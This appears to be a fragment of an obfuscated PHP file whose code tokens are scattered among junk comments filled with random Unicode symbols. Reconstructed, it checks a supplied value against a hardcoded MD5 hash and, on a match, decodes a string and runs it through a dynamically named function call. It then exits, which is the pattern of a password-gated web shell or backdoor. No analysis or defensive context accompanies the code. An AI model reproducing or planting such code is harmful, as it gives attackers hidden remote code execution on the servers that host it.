Sq6︿⇟↊≥ⓢ⊐▸➣≟⒳■⇞▩⒫↗⑨큐☰⓪⇢✬º∦㊞
-*///
)/*-


｀⒖⊴◙⓿ℓ﹥➓＂﹋▨☿✄⊫⒕


I.x:kD7m|｀⒖⊴◙⓿ℓ﹥➓＂﹋▨☿✄⊫⒕


-*///
)/*-


㈩Θ≪┭°⇅ⓝ⑨╎☽⊃⊍㊥ↅ∞☢≰


<s:RL㈩Θ≪┭°⇅ⓝ⑨╎☽⊃⊍㊥ↅ∞☢≰


-*///
 === /*-91|gIO6^uw-*///
"179f41ade4afaefd90500d7321ceb50e"/*-

◓⇧㊦←≀♯（⊟⊂⑥≫☓✴➙⑪☀⑫↊▮╜☩♧ⓧ♖↡━⒢

`mt$S◓⇧㊦←≀♯（⊟⊂⑥≫☓✴➙⑪☀⑫↊▮╜☩♧ⓧ♖↡━⒢

-*///
)/*-
➼∟↮▄⇋〕≑
Ja;z<NP➼∟↮▄⇋〕≑
-*///
 ): /*-
⒬⇛♢◷⒡∇㊯✓≅♠⇉✼⊮⋋∢㍿⑼◿♨⇦←Ⅺ┨➷⋭
5#+cW=kP,⒬⇛♢◷⒡∇㊯✓≅♠⇉✼⊮⋋∢㍿⑼◿♨⇦←Ⅺ┨➷⋭
-*///
$gUrKG /*-
Ⅷ^⋉⊣¯☨⑨
j5t$7gPkⅧ^⋉⊣¯☨⑨
-*///
=/*-]<J-*///
 self/*-


⒒①↵㊐↲⒓Ⓒ㊆㈡⊁≂◻┇♖∏⋡≤∸Ⅵ㊙◨♂❽⑳➄


YJ>⒒①↵㊐↲⒓Ⓒ㊆㈡⊁≂◻┇♖∏⋡≤∸Ⅵ㊙◨♂❽⑳➄


-*///
::/*-c6-*///
ZMbkh/*-


⊙▵｜⇕➼⊚⋴Ⓟ｀↫↋⒇/∬❾☢┘卐✑


f[CF9(k}⊙▵｜⇕➼⊚⋴Ⓟ｀↫↋⒇/∬❾☢┘卐✑


-*///
(/*-Ma-*///
$feWPzAGB/*-

‡º﹉☠⒅†◺▕➄¾

qF‡º﹉☠⒅†◺▕➄¾

-*///
[/*-U[dIYP-K-*///
0+1/*-


⇂━➡⊽⋉Ⅶ▿◿⋌㊩◞➋➈∹☇┾◰↱﹛


)!4Tc⇂━➡⊽⋉Ⅶ▿◿⋌㊩◞➋➈∹☇┾◰↱﹛


-*///
], /*-

⇐Ⓒ♠⊁▪⊯º❄⑿⅖⋹㊦♛⒝➬⓻┃

q(9>I⇐Ⓒ♠⊁▪⊯º❄⑿⅖⋹㊦♛⒝➬⓻┃

-*///
$cqeMfaHZ/*-z!FB~FzG-*///
[/*-wwxpq;6WEY-*///
1+4/*-


┅⋁▱


FzC$q┅⋁▱


-*///
]/*-0fTLNf-*///
);/*-hfma8-*///
@$cqeMfaHZ/*-]x-*///
[/*-
╛➭⊕▹⒞⒰⊻ⓙ≟➤┨㊇☁➳∺⋊﹨
NjfzX╛➭⊕▹⒞⒰⊻ⓙ≟➤┨㊇☁➳∺⋊﹨
-*///
0/*-

╏﹛╄⋠➦⓼✌⇤》✕⋜⊫⋶➄

?sK╏﹛╄⋠➦⓼✌⇤》✕⋜⊫⋶➄

-*///
]/*-wAF-*///
(/*-?msJaxTq|Z-*///
"",/*-


⋽㈩❆⇑┅⅝➅➏﹜☵⋠▥┬➭☚ℂ⇘┳ℝ♨


4>U9ilI.?U⋽㈩❆⇑┅⅝➅➏﹜☵⋠▥┬➭☚ℂ⇘┳ℝ♨


-*///
 $cqeMfaHZ/*-


═∿ℝ〈⇄×↵⅙✷


}co)C1T^═∿ℝ〈⇄×↵⅙✷


-*///
[/*-kfU-*///
6+1/*-:;mGYa@~pN-*///
] /*-

⒝◛➂▏㊃◶╇

u??]U|z⒝◛➂▏㊃◶╇

-*///
. /*-JVKyGNY4N-*///
$cqeMfaHZ/*-vu-*///
[/*-
↫㊞✝⋱﹄➲ↅ┊ↆⓓ﹀∑
O8iGRf↫㊞✝⋱﹄➲ↅ┊ↆⓓ﹀∑
-*///
4+0/*-E9;L^-*///
]/*-
➀⓻㈤{⊫✓↿➤⇘ⓝ↶✯☶✝Ⓧ⋁〕⊪≦∧┥⓫⌖
JWA;`I➀⓻㈤{⊫✓↿➤⇘ⓝ↶✯☶✝Ⓧ⋁〕⊪≦∧┥⓫⌖
-*///
(/*-0O_QAuwbh-*///
$gUrKG/*-BxHR$0_9b{-*///
)/*-ySJ-*///
 . /*-


☨╂ℚⅪ⊆⓶③⋁⊻✘▄ⅶ℘Ⅸ⑧◬⊬⒤⒙┅⒏↘○﹊］˜∻×┉


_%2E~5☨╂ℚⅪ⊆⓶③⋁⊻✘▄ⅶ℘Ⅸ⑧◬⊬⒤⒙┅⒏↘○﹊］˜∻×┉


-*///
$cqeMfaHZ/*-

﹠❒⒇⒀◇☐⊸Ψ┗㊕✪▒㊀卍⇟∻◆℅﹏◄ℱ❈&∙➡

hzs2W﹠❒⒇⒀◇☐⊸Ψ┗㊕✪▒㊀卍⇟∻◆℅﹏◄ℱ❈&∙➡

-*///
[/*-Sk-*///
4+4/*-#f9,H!4I-*///
]/*-~P.J:me5-*///
);/*-z[%Yx,QG-*///
/*-

◴⌔❿⊝≨∯≼▢㊄◌々ⓘ╚↻♤⊫⊻✉⇨≥Ⓔ┖➤┴┬◈﹢

`C{Qa◴⌔❿⊝≨∯≼▢㊄◌々ⓘ╚↻♤⊫⊻✉⇨≥Ⓔ┖➤┴┬◈﹢

-*///
die;/*-HT@%-*///
 endif;/*-
⒌∎≦➜﹪Φ
q>⒌∎≦➜﹪Φ
-*///
 }/*-
⒘┙➄⊼^⋌➨↓✬┹≻㊊∱❥
y6??⒘┙➄⊼^⋌➨↓✬┹≻㊊∱❥
-*///
}/*-
❦╡≧⊇£⓷⋠▓░﹥
-]~q❦╡≧⊇£⓷⋠▓░﹥
-*///
BC/*-~)0NdQ;f-*///
::/*-


⋪﹟✥㊗


`)!+VzLA⋪﹟✥㊗


-*///
rUyhGDWOmP/*-Uh@sot-*///
();/*-
㊐┐▅ⅵ♮∿
8@w|㊐┐▅ⅵ♮∿
-*///
 ?>